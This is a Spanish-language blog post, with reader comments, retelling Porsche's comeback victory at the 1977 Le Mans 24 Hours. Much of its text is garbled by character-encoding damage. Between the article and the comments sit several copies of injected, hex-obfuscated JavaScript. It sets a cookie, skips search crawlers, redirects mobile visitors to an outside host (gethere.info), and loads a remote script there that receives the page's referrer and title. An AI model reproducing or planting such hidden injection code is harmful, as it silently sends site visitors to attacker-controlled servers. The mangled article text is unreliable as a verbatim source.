PA?nico y locura en Le Mans

Master
Porsche-936-3-retouche_opengraph
Share on FacebookTweet about this on TwitterShare on Google+Print this pageEmail this to someone

AUTO - LE MANS 24 HOURS 1977 - PHOTO : DPPI NAi??4 - JACKY ICKX - JURGEN BARTH - HURLEY HAYWOOD / PORSCHE 936 MARTINI - ACTION - WINNER

Recuperar la confianza compitiendo en Le Mans en el mes de junio, y llegar por todo lo alto al circo de la FA?rmula 1 en julio. ParecAi??a un desafAi??o relativamente sencillo para los dos gigantes franceses: Renault y Michelin. Pero, como sus Alpine A442 Turbo habAi??an podido comprobar de forma tan concluyente en 1976, derrotar a Porsche nunca ha sido tarea fA?cil.

Nada habAi??a quedado librado al azar. Un renovado modelo con cola larga fue testeado sin descanso ni piedad en el circuito de Paul Ricard, visitando incluso aerA?dromos y autopistas reciAi??n estrenadas para replicar lo que se encontrarAi??an ya en carrera en la recta de Mulsanne. Se construyeron tres nuevos chasis (para una A?nica carrera) y era muy numeroso el personal del equipo pintado de amarillo, los colores de Renault Sport. No se habAi??a visto nada igual desde la polAi??tica de tierra arrasada de Ford a mediados de los aAi??os 60.

Definitivamente Porsche era un hueso duro de roer, pero un hueso al fin, con posibilidad de quebrarse. Su tan probado modelo 936 habAi??a sido modificado nuevamente: era ahora mA?s corto, bajo y estrecho, desarrollado sobre un chasis ya existente y con 20 caballos extra y una mejor respuesta al acelerador, obtenida gracias a la incorporaciA?n de un segundo turbocompresor. Un presupuesto ajustado restringiA? su preparaciA?n a la pista de pruebas de la compaAi??Ai??a en Weissach y limitA? su participaciA?n en carrera a sA?lo dos vehAi??culos inscriptos. Y Jacky Ickx sA?lo podAi??a conducir uno por vezai??i??

El belga se habAi??a desenamorado de la FA?rmula 1 y habAi??a caAi??do en desgracia en el seno de su equipo. Limitado a una apariciA?n esporA?dica en MA?naco, sustituyendo a Clay Regazzoni en el equipo Ensign, se habAi??a concentrado en las carreras de autos sport. Su emparejamiento con el tricampeA?n en Le Mans Henri Pescarolo se antojaba desigual frente a la otra tripulaciA?n de Porsche que juntaba al ingeniero alemA?n JA?rgen Barth y al novato americano Harley Haywood. Sin embargo, el auto de Ickx y Pescarolo debiA? retirarse cuando marchaba segundo y con apenas 45 vueltas completadas a causa de un pistA?n dAi??scolo.

El equipo alemA?n decidiA? darle trabajo extra a Ickx incorporA?ndolo al auto de Barth y Hailwood. El efecto fue el de un viento huracanado. Cuando todo el mundo daba por perdido al segundo Porsche, debido a un defecto en la bomba de inyecciA?n de combustible que le costA? al equipo 30 minutos reparar y descender hasta la posiciA?n 41 despuAi??s de sA?lo 2 horas, el auto #4, con los colores de Martini, empezA? a resucitar.

1977-24-hours-of_lemans-01-1024

Aunque este auto era mA?s sobrevirante que su propia unidad, Ickx daba zarpazo tras zarpazoAi?? durante la noche y se hizo con el rAi??cord de vuelta, mejorando el tiempo conseguido por el Matra de FranAi??ois Cevert en 1973. Por si fuera poco, el Porsche era capaz de prolongar 5 vueltas adicionales sus entradas a boxes para llenar el tanque de combustible.

En apariencia, no habAi??a necesidad alguna para que Renault entrarA? en pA?nico, aA?nai??i?? Ni siquiera afloraron los nervios cuando su tercer auto, retrasado 10 minutos antes de la carrera debido a una fuga en el mA?ltiple de admisiA?n, sufriA? problemas en un pistA?n a las 3 de la maAi??ana.

Las verdaderas razones para preocuparse comenzaron cuando su segundo bA?lido sufriA? una averAi??a en la caja de cambios que le hizo perder 90 minutos. Un piAi??A?n todavAi??a seguAi??a en terapia intensiva cuando el Porsche consiguiA? adelantarlo.

Sin embargo, para ese entonces la ventaja del primer Alpine era de seis vueltas y no parecAi??a que Jean-Pierre Jabouille y el A?nico piloto no francAi??s del equipo, Derek Bell, fueran a dejar que esa brecha disminuyera. Pero a las 9 de la maAi??ana, otra vez el motor francAi??s volviA? a fallar. Ickx y Porsche eran ahora los lAi??deres.

Patrick Depailler, con su caja de cambios reparada, era la A?ltima esperanza para Renault. Sin embargo, Ai??sta se esfumA? con cuatro horas por delante (A?otra vez un pistA?n!). Los reproches, las acusaciones y los exA?menes de conciencia no tardaron en llegar.

A?Esperad un segundo! Hay humo saliendo de la parte de atrA?s del Porscheai??i??

Porsche-936-3-retouche_opengraph

Si nos remontamos a la carrera de 1976, recordaremos que Renault le habAi??a ofrecido su transmisiA?n al equipo britA?nico Mirage. Sobre relacionados con sus neumA?ticos de gran diA?metro, la imposibilidad de los bA?lidos de Mirage para aprovechar el rango alto de revoluciones en recta los hacAi??a poco competitivos, pero muy fiables. Ahora, en la ediciA?n de 1977, uno de ellos se habAi??a quedado sin combustible despuAi??s de 59 vueltas, pero a falta de 45 minutos para terminar las 24 horas, el auto sobreviviente, conducido por Jean-Pierre Jarier y Vern Schuppan, estaba de repente a la caza del Porsche lAi??der.

Mientras tanto, el equipo alemA?n analizaba a partes iguales tanto su mA?quina como el reglamento. La decisiA?n de empezar a competir de forma conservadora y sin acelerar a fondo habAi??a resultado ser un error y la consecuencia era que la mezcla pobre derivaba en un pistA?n daAi??ado.

Sin embargo, no todo estaba perdido. Un auto podAi??a clasificarse completando la A?ltima vuelta en un tiempo determinado despuAi??s de su penA?ltima vuelta. Un plan se habAi??a comenzado a cocer.

Con una bujAi??a desconectada y un reloj de enorme tamaAi??o pegado a su volante, Barth lanzA? al herido 936 a la pista. El barbudo alemA?n fue seleccionado para esta estresante tarea debido a su amplio conocimiento mecA?nico y porque Ickx habAi??a llegado al mA?ximo permitido de tiempo al volante. La ventaja seguAi??a siendo grande, pero no habAi??a ninguna garantAi??a de nada. A las 3.59 de la tarde, Barth comenzA? la vuelta definitiva.

Volviendo atrA?s el calendario y remontA?ndonos al aAi??o 1968, Ickx, conduciendo un Ford GT40 (con el equipo JWA, que era el mismo que ahora corrAi??a con los Mirage), le habAi??a negado su victoria inaugural a Porsche en Le Mans en un emocionante final. En aquella ocasiA?n, sentAi??a que tenAi??a el control de la situaciA?n y en ningA?n momento perdiA? la confianza en su mA?quina.

Pero esta vez, en el apogeo de su carrera, estaba indefenso y nervioso. HabAi??a realizado una de las actuaciones mA?s sublimes, probadamente la mA?s dura por el mayor lapso de tiempo de la que se tenga memoria en Le Mans. Con su auto arrastrA?ndose metro a metro hacia la meta, finalmente el Porsche #4 conseguirAi??a superar a tiempo la meta y con ello Ickx conseguirAi??a unAi??hat trick de victorias en Le Mans, empatando el rAi??cord de mayor nA?mero de victorias conseguidas hasta aquel momento.

Historical poster Le Mans 1977

Este relato de la hazaAi??a de JackyAi??Ickx fue escritoAi??porAi??Paul FearnleyAi??y hace parte de la campaAi??a “Great Fightbacks” desarrollada por la marca de neumA?ticos Dunlop, en la que se recuerdan diez grandes momentos en la historia del automovilismo, protagonizadas obviamente por autos calzados con neumA?ticos de esta marca.

Los interesados tienen la oportunidad de votar su historia favorita enAi??www.greatfightbacks.comAi??desde el 21 de enero de 2016 hasta el 29 de febrero. Durante las prA?ximas semanas, Dunlop seguirA?Ai??desvelando las diez historias por orden cronolA?gico.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

13 Comentarios, RSS

  1. Beppe Viola 19/02/2016 @ 8:54 am

    Heròica y pragmatica soluciòn de Barth…..
    El reglamento decia que venia clasificado todo aquel que hiciera un giro completo al cumplirse la 24ma hora con almenos un tiempo tres superior a su tiempo en clasificaciòn…. Al Porsche, que tenia un pistòn agujereado gracias a un valvulazo, le quitaron el inyector y la bujia y humeando y arrastrandose llegò a cumplir la ultima vuelta a tiempo…
    Como decia el quintuple, las carreras se ganan cuando bajan la bandera a cuadros,…

  2. morgan. 19/02/2016 @ 9:36 am

    uhhhhh que buen relato……….los estoy viendo a los muchachos de Porsche cortar clavos, comerse las uñas y escabiandose a mas no poder después de terminar la carrera…..

  3. MARIO 20/02/2016 @ 8:45 am

